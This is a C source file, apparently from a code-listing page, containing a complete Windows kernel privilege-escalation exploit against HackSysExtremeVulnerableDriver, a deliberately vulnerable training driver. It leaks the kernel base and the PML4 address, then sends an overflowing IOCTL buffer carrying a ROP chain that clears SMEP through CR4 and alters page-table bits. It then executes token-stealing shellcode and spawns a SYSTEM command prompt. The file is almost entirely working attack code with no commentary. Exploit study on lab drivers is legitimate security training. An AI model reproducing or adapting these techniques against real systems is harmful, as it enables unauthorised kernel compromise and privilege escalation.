1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214
| #include <windows.h> #include <stdio.h>
#include "pml4-leak-melt.c"
#define DEVICE_NAME "\\\\.\\HackSysExtremeVulnerableDriver" #define IOCTL 0x222003
typedef struct SYSTEM_MODULE { ULONG Reserved1; ULONG Reserved2; ULONG Reserved3; PVOID ImageBaseAddress; ULONG ImageSize; ULONG Flags; WORD Id; WORD Rank; WORD LoadCount; WORD NameOffset; CHAR Name[256]; }SYSTEM_MODULE, * PSYSTEM_MODULE;
typedef struct SYSTEM_MODULE_INFORMATION { ULONG ModulesCount; SYSTEM_MODULE Modules[1]; } SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 0xb } SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)( __in SYSTEM_INFORMATION_CLASS SystemInformationClass, __inout PVOID SystemInformation, __in ULONG SystemInformationLength, __out_opt PULONG ReturnLength );
HANDLE grab_handle() {
HANDLE hFile = CreateFileA(DEVICE_NAME, FILE_READ_ACCESS | FILE_WRITE_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) { exit(1); }
return hFile; }
void send_payload(HANDLE hFile, INT64 kernel_base) {
UCHAR shellcode[] = { 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x98, 0xB8, 0x04, 0x00, 0x00, 0x48, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x48, 0x2D, 0x48, 0x04, 0x00, 0x00, 0x48, 0x8B, 0x88, 0x40, 0x04, 0x00, 0x00, 0x48, 0x83, 0xF9, 0x04, 0x75, 0xE6, 0x48, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x0B, 0x4C, 0x8B, 0x2C, 0x24, 0x4D, 0x89, 0xFB, 0x49, 0x81, 0xEB, 0x80, 0x38, 0x07, 0x00, 0x49, 0x83, 0xC3, 0x02, 0x6A, 0x00, 0x49, 0x81, 0xED, 0xF1, 0x31, 0x00, 0x00, 0x41, 0x55, 0x41, 0x55, 0x41, 0x53, 0x41, 0x53, 0x41, 0x53, 0x41, 0x53, 0x49, 0x83, 0xEB, 0x02, 0x41, 0x53, 0x41, 0x54, 0x41, 0x56, 0x41, 0x57, 0x48, 0xB8, 0xB9, 0x00, 0x00, 0x8A, 0x00, 0x00, 0x00, 0x00, 0x48, 0xC7, 0xC3, 0x00, 0x00, 0x00, 0x00, 0x48, 0xC7, 0xC1, 0x00, 0x00, 0x00, 0x00, 0x48, 0xC7, 0xC2, 0x00, 0x00, 0x00, 0x00, 0x48, 0xC7, 0xC6, 0x00, 0x00, 0x00, 0x00, 0x48, 0xC7, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x49, 0xC7, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x49, 0xC7, 0xC1, 0x00, 0x00, 0x00, 0x00, 0x49, 0xC7, 0xC2, 0x00, 0x00, 0x00, 0x00, 0x49, 0xC7, 0xC3, 0x00, 0x00, 0x00, 0x00, 0x49, 0xC7, 0xC4, 0x00, 0x00, 0x00, 0x00, 0x49, 0xC7, 0xC5, 0x00, 0x00, 0x00, 0x00, 0x49, 0xC7, 0xC6, 0x00, 0x00, 0x00, 0x00, 0x49, 0xC7, 0xC7, 0x00, 0x00, 0x00, 0x00, 0xC3 }; LPVOID shellcode_addr = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); printf("[>] Shellcode allocated in userland at: 0x%llx",(UINT64)shellcode_addr); memcpy(shellcode_addr, shellcode, sizeof(shellcode)); unsigned __int64 initial_time; unsigned int candidate_entry; void *pml4_address;
printf ( "\n" ); printf ( "[+] Leaking PML4...\n" );
initial_time = GetTickCount ();
if ( get_pml4_address ( &candidate_entry , &pml4_address ) == TRUE ) { printf ( "[+] Elapsed time: %lli ms\n" , GetTickCount () - initial_time ); printf ( "[+] PML4: %I64x (entry %x)\n" , ( unsigned __int64 ) pml4_address , candidate_entry ); } else { printf ( "[-] Error: PML4 couldn't be leaked\n" ); exit(0); } printf ( "[>] init buff!\n" );
INT64 pop_rcx_offset = kernel_base + 0x3f34d0; INT64 rcx_value = 0x70678; INT64 mov_cr4_offset = kernel_base + 0x9a323d; INT64 mov_rax_rcx = kernel_base + 0x140205364 - 0x140000000; INT64 pop_rax = kernel_base + 0x1402017f2 - 0x140000000; INT64 mov_rcx_eax = kernel_base + 0x1405601a1 - 0x140000000; INT64 sub_esp_rcx = kernel_base + 0x1404160f0 - 0x140000000; INT64 pop_rax_rcx = kernel_base + 0x1403f34cf - 0x140000000; INT64 wbinvd = kernel_base + 0x14037fc50 - 0x140000000; INT64 sub_stack_value = 0x60;
INT64 mask = 0x0a000001 + 0x100 - 0x48; INT64 mask_u = 0x8a000001 + 0x100 - 0x48; INT64 pml4_for_shellcode = (( unsigned __int64 ) pml4_address + 0x1c);
BYTE input_buff[0x818 + 0x8 * 9] = { 0 }; memset(input_buff, '\x41', 0x818); memcpy(input_buff + 0x818 + 0x8 * 0, (PINT64)&pop_rcx_offset, 8); memcpy(input_buff + 0x818 + 0x8 * 1, (PINT64)&rcx_value, 8); memcpy(input_buff + 0x818 + 0x8 * 2, (PINT64)&mov_cr4_offset, 8);
memcpy(input_buff + 0x818 + 0x8 * 3, (PINT64)&pop_rax_rcx, 8); memcpy(input_buff + 0x818 + 0x8 * 4, (PINT64)&mask, 8); memcpy(input_buff + 0x818 + 0x8 * 5, (PINT64)&pml4_for_shellcode, 8); memcpy(input_buff + 0x818 + 0x8 * 6, (PINT64)&mov_rcx_eax, 8); memcpy(input_buff + 0x818 + 0x8 * 7, (PINT64)&wbinvd, 8); memcpy(input_buff + 0x818 + 0x8 * 8, (PINT64)&shellcode_addr, 8);
memcpy(input_buff + 0x818 + 0x8 * 5 - 0x40, (PINT64)&pop_rcx_offset, 8); memcpy(input_buff + 0x818 + 0x8 * 6 - 0x40, (PINT64)&pml4_for_shellcode, 8); memcpy(input_buff + 0x818 + 0x8 * 7 - 0x40, (PINT64)&mov_rcx_eax, 8);
printf ( "[>] go!\n" );
DWORD bytes_ret = 0x0;
int result = DeviceIoControl(hFile, IOCTL, input_buff, sizeof(input_buff), NULL, 0, &bytes_ret, NULL);
if (!result) { printf ( "[-] Error!\n" ); } }
INT64 get_kernel_base() {
PNtQuerySystemInformation NtQuerySystemInformation = (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation) { exit(1); }
ULONG len = 0; NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION) VirtualAlloc(NULL, len, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
if (status != (NTSTATUS)0x0) { exit(1); }
PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;
return (INT64)kernelImageBase; }
void spawn_shell() {
PROCESS_INFORMATION pi; ZeroMemory(&pi, sizeof(pi));
STARTUPINFOA si; ZeroMemory(&si, sizeof(si));
printf ( "[>] shell!\n" );
CreateProcessA("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); }
int main() {
HANDLE hFile = grab_handle();
INT64 kernel_base = get_kernel_base(); send_payload(hFile, kernel_base); spawn_shell(); }
|